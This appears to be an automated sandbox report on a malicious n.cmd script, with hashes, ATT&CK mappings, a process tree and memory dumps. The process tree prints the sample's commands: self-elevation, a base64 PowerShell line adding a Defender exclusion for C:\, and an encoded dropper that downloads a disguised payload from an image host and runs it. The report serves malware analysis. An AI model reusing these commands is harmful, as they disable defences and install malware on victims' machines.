ea4b2c7dbf2be84aa81e55112e40392a7c54cfabde85d3ece594d834b3c9254d

General

Target

n.cmd
Size

1KB
MD5

fa75e849a3beb187d543d9b4ae894dcc
SHA1

41b1a755057677bfa617c089ba6092733155a1f0
SHA256

ea4b2c7dbf2be84aa81e55112e40392a7c54cfabde85d3ece594d834b3c9254d
SHA512

eed68bf4aba6af83620591f9cdefbe5e954f5bfbb14116015c215b306ecde7e8f9736b7e886e6ecbc0a71dda8ba2a58c7f4b5b7b6354104652715052e016f91f

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://i.imghippo.com/files/CFqi5277Mc.jpg

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1364	powershell.exe
2504	powershell.exe
2616	powershell.exe
2676	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2504	powershell.exe
2676	powershell.exe
2676	powershell.exe
2676	powershell.exe
2616	powershell.exe
2584	powershell.exe
1364	powershell.exe
1936	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	1936	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2228 wrote to memory of 2504	2228	cmd.exe	30
PID 2228 wrote to memory of 2504	2228	cmd.exe	30
PID 2228 wrote to memory of 2504	2228	cmd.exe	30
PID 2228 wrote to memory of 2676	2228	cmd.exe	31
PID 2228 wrote to memory of 2676	2228	cmd.exe	31
PID 2228 wrote to memory of 2676	2228	cmd.exe	31
PID 2676 wrote to memory of 2636	2676	powershell.exe	32
PID 2676 wrote to memory of 2636	2676	powershell.exe	32
PID 2676 wrote to memory of 2636	2676	powershell.exe	32
PID 2636 wrote to memory of 2616	2636	cmd.exe	34
PID 2636 wrote to memory of 2616	2636	cmd.exe	34
PID 2636 wrote to memory of 2616	2636	cmd.exe	34
PID 2636 wrote to memory of 2584	2636	cmd.exe	35
PID 2636 wrote to memory of 2584	2636	cmd.exe	35
PID 2636 wrote to memory of 2584	2636	cmd.exe	35
PID 2584 wrote to memory of 1364	2584	powershell.exe	36
PID 2584 wrote to memory of 1364	2584	powershell.exe	36
PID 2584 wrote to memory of 1364	2584	powershell.exe	36
PID 2636 wrote to memory of 1936	2636	cmd.exe	37
PID 2636 wrote to memory of 1936	2636	cmd.exe	37
PID 2636 wrote to memory of 1936	2636	cmd.exe	37

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\n.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w h -command ""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\n.cmd' -ArgumentList 'am_admin'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2676
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\n.cmd" am_admin
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w h -command ""
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGkALgBpAG0AZwBoAGkAcABwAG8ALgBjAG8AbQAvAGYAaQBsAGUAcwAvAEMARgBxAGkANQAyADcANwBNAGMALgBqAHAAZwAiADsAJABwAGEAdABoAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE8AbgBlAEQAcgBpAHYAZQAiADsAbQBrAGQAaQByACAAJABwAGEAdABoACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsAaQB3AHIAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAIgAkAHAAYQB0AGgAXABiAHUAZABkAHkALgBqAHAAZwAiADsAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABUAGUAeAB0ACgAIgAkAHAAYQB0AGgAXABPAG4AZQBEAHIAaQB2AGUALgBjAG0AZAAiACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABnAGMAIAAiACQAcABhAHQAaABcAGIAdQBkAGQAeQAuAGoAcABnACIAIAAtAFIAYQB3ACkAKQApACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAHAAYQB0AGgAXABPAG4AZQBEAHIAaQB2AGUALgBjAG0AZAAiAA0ACgA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1936

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
add4bcee903e78d75b7b1befd5077487

SHA1
fd886e392c8ee8108ca46f22d76d85540c21fd38

SHA256
7b5954e2d3200703cff6f0829512cab99930074ef52c77b3fae383b698d9c871

SHA512
20d15bbce1ddc159d216cbe3e175eef26c09db89556157232b0523947eabcdc06d554698f5a7b6ec64abfd2080b8ad73e69a877a288eaadeb4f207591d0e4540

Download Submit
memory/2504-4-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

Filesize
4KB

Download
memory/2504-5-0x000000001B7B0000-0x000000001BA92000-memory.dmp

Filesize
2.9MB

Download
memory/2504-6-0x0000000001C90000-0x0000000001C98000-memory.dmp

Filesize
32KB

Download
memory/2504-7-0x00000000027F4000-0x00000000027F7000-memory.dmp

Filesize
12KB

Download
memory/2504-8-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

Filesize
9.6MB

Download
memory/2504-39-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

Filesize
9.6MB

Download
memory/2676-14-0x0000000002B60000-0x0000000002BE0000-memory.dmp

Filesize
512KB

Download
memory/2676-15-0x000000001B790000-0x000000001BA72000-memory.dmp

Filesize
2.9MB

Download
memory/2676-16-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing